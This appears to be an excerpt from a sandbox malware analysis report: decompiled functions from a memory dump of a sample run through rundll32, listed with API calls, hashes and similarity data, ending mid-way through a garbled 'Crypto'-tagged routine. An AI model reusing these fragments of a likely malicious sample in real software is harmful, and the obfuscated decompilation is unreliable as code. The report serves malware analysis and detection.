                          0x0282ea81
                          0x0282ea89
                          0x00000000
                          0x0282ea8f
                          0x0282ea1e
                          0x0282ea25
                          0x0282ea2c
                          0x00000000
                          0x0282ea3a
                          0x0282ea49
                          0x0282ea4e
                          0x00000000
                          0x00000000
                          0x0282ea4e
                          0x0282ea2c
                          0x0282eb99

                          APIs
                          • GetKeyboardState.USER32(?,?,?,?,?,02831AEC), ref: 0282EB3D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: KeyboardState
                          • String ID:
                          • API String ID: 1724228437-0
                          • Opcode ID: d2397e8f749fece150f23bbda70cdf7d474617b2b08ade5805450449e1f5b178
                          • Instruction ID: c21225aa86413670144cabe5074e280c0ad2e23cb17ffba2efd42cc963e8169c
                          • Opcode Fuzzy Hash: d2397e8f749fece150f23bbda70cdf7d474617b2b08ade5805450449e1f5b178
                          • Instruction Fuzzy Hash: 2F418E3CA006298FCB21DB28C5887A977E5FB45314F1845A5D44AEB290C774FDC9CF9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D8B14 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D8B14(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E027D4F5C(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E027D4F5C(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                          0x027d8b1b
                          0x027d8b20
                          0x027d8b22
                          0x027d8b22
                          0x027d8b35
                          0x027d8b44
                          0x027d8b47
                          0x027d8b54
                          0x027d8b57
                          0x027d8b5c
                          0x027d8b5f
                          0x027d8b61
                          0x027d8b6e
                          0x027d8b71
                          0x027d8b76
                          0x027d8b79
                          0x027d8b7b
                          0x027d8b84

                          APIs
                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027D8B35
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DiskFreeSpace
                          • String ID:
                          • API String ID: 1705453755-0
                          • Opcode ID: fa0016be90b420377e4fc610e57c20bba999cfc4570db0a4da0a65e413e330a2
                          • Instruction ID: c8f57040b83f68c308837ef2f08dd7330a47d191b1666b32ce8805bf3dc1e1e6
                          • Opcode Fuzzy Hash: fa0016be90b420377e4fc610e57c20bba999cfc4570db0a4da0a65e413e330a2
                          • Instruction Fuzzy Hash: DC11DEB5E00209AF9B45CF99C881DAFF7FAFFC9300B14C569A519E7254E7319A018BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02803E5C Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E02803E5C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L027D6A3C();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x2803e96);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E027D3408(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                          0x02803e65
                          0x02803e68
                          0x02803e6a
                          0x02803e70
                          0x02803eb4
                          0x02803eb8
                          0x02803eb9
                          0x02803ebd
                          0x02803ec0
                          0x02803ec1
                          0x02803ec6
                          0x00000000
                          0x02803ec6
                          0x02803e75
                          0x02803e7a
                          0x02803e7d
                          0x02803e87
                          0x02803e8e
                          0x02803e91
                          0x00000000

                          APIs
                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 02803EC1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 88b6f79102ac23e1d4ec93bc0b8b3d72a4e065bfe0742dbb9661704f1dacaa68
                          • Instruction ID: 444462be3ae9a1319d702a12d49437e349f1041637cc833c816deb3fb4335ae9
                          • Opcode Fuzzy Hash: 88b6f79102ac23e1d4ec93bc0b8b3d72a4e065bfe0742dbb9661704f1dacaa68
                          • Instruction Fuzzy Hash: F3F0907A608204EFAB51DF9AEC91C9ABBECEB4972035140A6F908D7740D235AD00CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D606E Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E027D606E(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x27d60d6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E027D4358( &_v20, 7,  &_v15);
				E027D2C40(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E027D60DD);
				return E027D40E8( &_v20);
			}








                          0x027d6079
                          0x027d607e
                          0x027d607f
                          0x027d6084
                          0x027d6087
                          0x027d6096
                          0x027d60a6
                          0x027d60b1
                          0x027d60bc
                          0x027d60bc
                          0x027d60c2
                          0x027d60c5
                          0x027d60c8
                          0x027d60d5

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 9a9c592cf3228b002b16569a4dd68197ba7de6c1dfbebc7473cedc57a9897cf1
                          • Instruction ID: f40cae3cf270a251c0fd4576644963a39699c9cff40535a46dd69006cc0028b8
                          • Opcode Fuzzy Hash: 9a9c592cf3228b002b16569a4dd68197ba7de6c1dfbebc7473cedc57a9897cf1
                          • Instruction Fuzzy Hash: CCF0C830A04309AFFB15DEA0CC55EEEB77BF784710F818975A52493580EB746A04CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D6070 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E027D6070(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x27d60d6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E027D4358( &_v20, 7,  &_v15);
				E027D2C40(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E027D60DD);
				return E027D40E8( &_v20);
			}








                          0x027d6079
                          0x027d607e
                          0x027d607f
                          0x027d6084
                          0x027d6087
                          0x027d6096
                          0x027d60a6
                          0x027d60b1
                          0x027d60bc
                          0x027d60bc
                          0x027d60c2
                          0x027d60c5
                          0x027d60c8
                          0x027d60d5

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 7118fd6a14639dbd6b6106203d3844125768dda08d9704328b0f32044a076d1d
                          • Instruction ID: 5837530a264acd2004c3d854362a789a6f9c56718ddde1c291db4c34182c6054
                          • Opcode Fuzzy Hash: 7118fd6a14639dbd6b6106203d3844125768dda08d9704328b0f32044a076d1d
                          • Instruction Fuzzy Hash: 73F0C230A04309AFEB15EEA0CC55EEEB77BFB84710F818975922463580EBB42A04CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F8DCC Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E027F8DCC(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                          0x027f8dd2
                          0x027f8dd5
                          0x027f8dd8
                          0x027f8ddc
                          0x027f8de1
                          0x027f8de7
                          0x027f8de8
                          0x027f8df2
                          0x027f8e05
                          0x027f8e0e
                          0x027f8e16
                          0x027f8e19
                          0x027f8e19
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027f8df4
                          0x027f8df4
                          0x027f8df7
                          0x027f8df9
                          0x027f8dfc
                          0x027f8dff
                          0x027f8dff
                          0x00000000
                          0x027f8df4
                          0x027f8e20

                          APIs
                          • GetSystemInfo.KERNEL32(?), ref: 027F8DDC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0
                          • Opcode ID: b8c6cea978487785527aa084d336ef268789afd8e8d40c78b767439d1045318d
                          • Instruction ID: 3dfe0ea8e1227826cbcd4cf22a339bf9b20eb9d60aff7394ed96d792564ba781
                          • Opcode Fuzzy Hash: b8c6cea978487785527aa084d336ef268789afd8e8d40c78b767439d1045318d
                          • Instruction Fuzzy Hash: 62F0F0B2E041089FCB00DF98C48889DBBB8FB56305B4042D9C504A7342EB30A694CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB408 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DB408(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E027D413C(_t10, _t18);
				}
				return E027D41D8(_t10, _t5 - 1,  &_v260);
			}






                          0x027db413
                          0x027db415
                          0x027db42d
                          0x00000000
                          0x027db445
                          0x00000000

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: be31c7a4645edda62e8c05d0072737695763908cd5bda183f1fc09d57379da4d
                          • Instruction ID: b52eee742141f8ecc5dfa3dc46af40c9868da1c3c1e0dafe6fb3b2151437f6a5
                          • Opcode Fuzzy Hash: be31c7a4645edda62e8c05d0072737695763908cd5bda183f1fc09d57379da4d
                          • Instruction Fuzzy Hash: 06E0D87270021417D711A5589C88AF7B36DD768310F00427ABE04D7380EEF1AD908BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02818E08 Relevance: 1.5, APIs: 1, Instructions: 25windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02818E08(intOrPtr* __eax, intOrPtr* __edx) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				void* _t16;

				_v12 = __edx;
				_v8 = __eax;
				if(IsIconic(E02833F7C(_v8)) != 0) {
					 *_v12 = 0x27;
					_t16 =  *((intOrPtr*)( *_v8 - 0x10))();
				} else {
					_t16 = E028323D0(_v8, _v12);
				}
				return _t16;
			}






                          0x02818e0e
                          0x02818e11
                          0x02818e24
                          0x02818e36
                          0x02818e44
                          0x02818e26
                          0x02818e2c
                          0x02818e2c
                          0x02818e4a

                          APIs
                          • IsIconic.USER32(00000000), ref: 02818E1D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Iconic
                          • String ID:
                          • API String ID: 110040809-0
                          • Opcode ID: 7ff8e2acc694d800b5d65bb5ba3c5ea45382089a99a28e389665102748badac9
                          • Instruction ID: ba491ba168d58469102d739aeaf4667aa793bf4b9ebfbd821a33afee4b690fca
                          • Opcode Fuzzy Hash: 7ff8e2acc694d800b5d65bb5ba3c5ea45382089a99a28e389665102748badac9
                          • Instruction Fuzzy Hash: 6AF0ED38908208EFDB00EFA8D98599DBBF9EF44324F204195D818E7790EB71AE40DF85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281D70C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E0281D70C(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26);
				L027D6A3C();
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                          0x0281d718
                          0x0281d722
                          0x0281d72b
                          0x0281d732
                          0x0281d735
                          0x0281d736
                          0x0281d741
                          0x0281d745

                          APIs
                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,0281DE85,?,00000000,0281DE90), ref: 0281D736
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 25329ab993a4fc423ea24c17a98d3217d57d3b654c5eedd0bedb920bdb975686
                          • Instruction ID: 3d21191afac56d84187ea05d6e2706f9d8e2c162a477a3a5be480c7ac92e3a59
                          • Opcode Fuzzy Hash: 25329ab993a4fc423ea24c17a98d3217d57d3b654c5eedd0bedb920bdb975686
                          • Instruction Fuzzy Hash: 3DF0C579205608AF8B40DF9DD588D4AFBE9BB4C260B458190B988CB321C630FD818F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB454 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027DB454(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                          0x027db457
                          0x027db458
                          0x027db46e
                          0x027db475
                          0x027db470
                          0x027db470
                          0x027db470
                          0x027db47b

                          APIs
                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027DCD56,00000000,027DCF6F,?,?,00000000,00000000), ref: 027DB467
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: a8582b32a9b0c6f87dc56ac98b31e83e3a88023630d9df4cc8848cf2a49458b3
                          • Instruction ID: aa0b1e489b4b84994534805ac8c5e1553cd4a7d108b061b183160084d4a4db46
                          • Opcode Fuzzy Hash: a8582b32a9b0c6f87dc56ac98b31e83e3a88023630d9df4cc8848cf2a49458b3
                          • Instruction Fuzzy Hash: 13D05EA630D2507AE310955A2D84DBB4BACCAC57A4F015039B9C8C6211D2108C06D7B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D9ED4 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D9ED4() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}




                          0x027d9ed8
                          0x027d9ee4

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LocalTime
                          • String ID:
                          • API String ID: 481472006-0
                          • Opcode ID: 251f540875d5d1ecc21c3323cbe2a9bc7b4e43dfc74e2aa4e866ba6ebeb5f1b4
                          • Instruction ID: e97df183178553fe7261875c23dba8169e7a83bb315e507c3bcde78ffacad0b5
                          • Opcode Fuzzy Hash: 251f540875d5d1ecc21c3323cbe2a9bc7b4e43dfc74e2aa4e866ba6ebeb5f1b4
                          • Instruction Fuzzy Hash: 36A0124C40480141864033184C0215430149810620FC4075098B8103D0E91901208597
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DD804 Relevance: .4, Instructions: 351COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E027DD804(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a1) {
				intOrPtr _v117;
				signed int _t143;
				signed char _t146;
				signed char _t147;
				signed char _t148;
				signed char _t151;
				signed char _t152;
				signed char _t153;
				signed char _t156;
				signed char _t164;
				signed int _t166;
				intOrPtr* _t171;
				intOrPtr* _t173;
				intOrPtr* _t175;
				intOrPtr* _t177;
				void* _t181;
				signed int _t182;
				intOrPtr* _t183;
				signed int _t184;
				intOrPtr* _t185;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t190;
				intOrPtr* _t191;
				signed int _t192;
				intOrPtr* _t193;
				signed int _t194;
				intOrPtr* _t195;
				signed int _t196;
				intOrPtr* _t197;
				signed int _t198;
				intOrPtr* _t199;
				signed int _t200;
				intOrPtr* _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t206;
				intOrPtr* _t207;
				signed int _t208;
				intOrPtr* _t209;
				signed int _t210;
				intOrPtr* _t211;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t214;
				void* _t216;
				void* _t219;
				void* _t222;
				void* _t223;
				intOrPtr _t225;
				void* _t226;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				signed int _t231;
				intOrPtr* _t232;
				signed int _t234;
				void* _t284;
				signed char _t285;
				void* _t286;
				void* _t287;
				void* _t290;
				void* _t291;
				signed int _t292;
				void* _t293;
				signed int _t296;
				signed int _t299;
				signed char _t303;
				signed char _t305;
				signed char _t306;
				void* _t310;
				void* _t316;
				signed int* _t329;
				signed int* _t330;
				signed char _t331;
				signed char _t332;
				intOrPtr* _t333;
				intOrPtr _t334;
				intOrPtr _t335;
				intOrPtr _t336;
				intOrPtr _t337;
				intOrPtr _t338;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr _t341;
				intOrPtr _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t346;
				void* _t355;
				signed int _t356;
				signed int _t357;
				intOrPtr _t359;
				void* _t362;

				_t348 = __esi;
				asm("sbb eax, 0x10000000");
				_t143 = __eax ^  *(__esi - 0x79ba37fe);
				_t146 = (_t143 ^  *(__esi - 0x79bb3ffe)) +  *(_t143 ^  *(__esi - 0x79bb3ffe)) ^  *(__esi - 0x79bd17fe);
				_t147 = _t146 ^  *(__esi - 0x79b9dbfe);
				_t148 = _t147 ^  *(__esi - 0x79b99bfe);
				_t151 = (_t148 ^  *(__esi - 0x79bc33fe)) + (_t148 ^  *(__esi - 0x79bc33fe)) ^  *(__esi - 0x79bb57fe);
				_t152 = _t151 ^  *(__esi - 0x79bd5ffe);
				_t329 = __edx + _t147 + _t152;
				_t153 = _t152 ^  *(__esi - 0x79bafffe);
				_t316 = __ecx +  *_t143 + _t148 + _t153;
				_t156 = (_t153 ^  *(__esi - 0x79baaffe)) + (_t153 ^  *(__esi - 0x79baaffe)) ^  *(__esi - 0x79bb87fe);
				_t310 = __ebx + _t146 + _t151 +  *((intOrPtr*)(_t156 - 0x7bfd79ce));
				_t356 = _t355 + 1;
				 *_t329 = _t156;
				 *_t329 = 0x32;
				0xaa805eb7();
				_t346 = __edi + 1;
				 *_t329 = ( *_t329 ^  *(__esi - 0x79bb83fe)) +  *((intOrPtr*)(( *_t329 ^  *(__esi - 0x79bb83fe)) + 0x68028632));
				_t164 =  *_t329 ^  *(__esi - 0x79ba63fe);
				_t330 = _t329 +  *((intOrPtr*)(_t164 + 0x74028632));
				 *_t330 = _t164;
				 *_t330 = _t330;
				_t166 =  *_t330;
				if( &_a1 < 0) {
					L6:
					_t331 =  &(_t330[0]);
					 *_t331 = _t166;
					asm("in al, 0x46");
					 *_t331 =  *_t331 ^ _t331;
					_t357 = _t356 + 1;
					_t171 =  *_t331;
					 *_t171 =  *_t171 - _t171;
					 *_t171 =  *_t171 + _t171;
					 *_t331 =  *_t331 - _t331;
					 *_t331 = _t171;
					asm("les eax, [esi-0x7a]");
					_t173 =  *_t331 +  *( *_t331);
					 *_t173 =  *_t173 + _t173;
					 *((intOrPtr*)(_t331 + _t348)) =  *((intOrPtr*)(_t331 + _t348)) + _t173;
					 *_t331 = _t173;
					asm("hlt");
					_t332 = _t331 + 1;
					_t175 =  *_t332;
					 *_t332 =  *_t331;
					 *_t175 =  *_t175 + _t175;
					 *_t175 =  *_t175 + _t175;
					 *_t332 =  *_t332 & _t332;
					 *_t332 = _t175;
					asm("cld");
					_t177 =  *_t332;
					 *_t177 =  *_t177 + _t177;
					 *_t177 =  *_t177 + _t177;
					asm("sbb al, 0x32");
					 *_t332 = _t177;
					 *0x28642 =  *0x28642 + 0x28642;
					 *0x28642 =  *0x28642 + _t310;
					_t181 = (0x00028642 ^  *(_t348 - 0x79bc7ffe)) +  *0x28642;
					 *0x28642 =  *0x28642 + _t181;
					_t53 = _t332 + _t348;
					 *_t53 =  *((intOrPtr*)(_t332 + _t348)) + _t332;
					_t182 =  *_t332;
					 *_t332 = _t181;
					if( *_t53 < 0) {
						L9:
						 *(_t348 - 0x79b99ffe) =  *(_t348 - 0x79b99ffe) ^ _t182;
						_t183 = _t182 +  *_t182;
						 *_t183 =  *_t183 + _t183;
						_t184 = _t183 + _t310;
						 *(_t348 - 0x79b9b7fe) =  *(_t348 - 0x79b9b7fe) ^ _t184;
						_t185 = _t184 +  *_t184;
						 *_t185 =  *_t185 + _t185;
						_t186 = _t185 + _t332;
						 *(_t348 - 0x79ba4bfe) =  *(_t348 - 0x79ba4bfe) ^ _t186;
						_t187 = _t186 +  *_t186;
						 *_t187 =  *_t187 + _t187;
						_t188 = _t187 + _t332;
						 *(_t348 - 0x79bb8bfe) =  *(_t348 - 0x79bb8bfe) ^ _t188;
						_t189 = _t188 +  *_t188;
						 *_t189 =  *_t189 + _t189;
						_t190 = _t189 + _t316;
						L10:
						 *(_t348 - 0x79bbf7fe) =  *(_t348 - 0x79bbf7fe) ^ _t190;
						_t191 = _t190 +  *_t190;
						 *_t191 =  *_t191 + _t191;
